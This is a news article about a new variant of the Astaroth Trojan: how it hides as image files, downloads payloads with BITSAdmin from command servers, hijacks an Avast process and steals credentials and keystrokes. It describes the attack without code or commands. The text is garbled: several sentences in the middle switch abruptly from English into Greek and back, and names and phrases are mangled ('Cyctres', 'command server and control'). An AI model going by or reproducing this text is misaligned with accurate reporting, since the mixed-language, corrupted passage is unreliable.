A new version of Trojan Astaroth has the ability to exploit vulnerable processes in anti-virus software and services. Researchers of Cyctres' nocturnus team reported today in a publication at their blog that the variant is able to use security software modules to steal credentials and personal data on the internet.
In its latest form, Astaroth is used in spam campaigns throughout Brazil and Europe, managing thousands of infections by the end of 2018. Malicious software spreads through .zip files and malicious links.
Astaroth Trojan: How It Works
Researchers report that the Trojan disguises itself as a JPEG, .GIF, or some file with no extension to avoid detection by security applications. when running on a machine. To complete the download of the malware the Microsoft Windows BITSAdmin tool is used from a command server and control (C2). Once downloaded, the malware runs an XSL script that creates a channel with the C2 server. The script allegedly contains functions that help the malicious application να κρυφτεί από λογισμικό ασφαλείας, αλλά και για να αξιοποιήσει το εργαλείο BITSAdmin για τη λήψη κακόβουλων φορτίων, από έναν ξεχωριστό διακομιστή C2. Οι προηγούμενες παραλλαγές του Trojan προσπαθούσαν στη συνέχεια για να βρουν προγράμματα προστασίας από ιούς και, σε περίπτωση που υπήρχε το Avast σε ένα μολυσμένο σύστημα, το malware θα σταματούσε να λειτουργεί. Ωστόσο, το νέο Astaroth μπορεί να κοροϊδέψει το πρόγραμμα προστασίας από ιούς και να προσθέσει “ένα κακόβουλο module σε μια από τις διεργασίες του”, σύμφωνα με τους ερευνητές. Αν ανιχνεύσει το Avast, παραβιάζει το Avast Software Runtime Dynamic Link Library, which runs modules for Avast with the aswrundll.exe process. The executable file – which looks like Microsoft's rundll32.exe – can run DLLs by calling its exported functions. The Trojan first appeared in attacks against users in South America during 2017. The malware is able to steal information from target systems, such as passwords access, data from the keyboard and any content that was on the clipboard. In addition, Astaroth is also able to monitor calls if installed on a suitable device and terminate various processes. The new malware also uses a fromCharCode() deobfuscation method to hide code execution. Last month, a new study published by the Malwarebytes reported that Trojan and backdoor attacks have more than doubled since the previous year. Also, spyware attacks have increased in frequency, recording an increase of 142% over the same period.
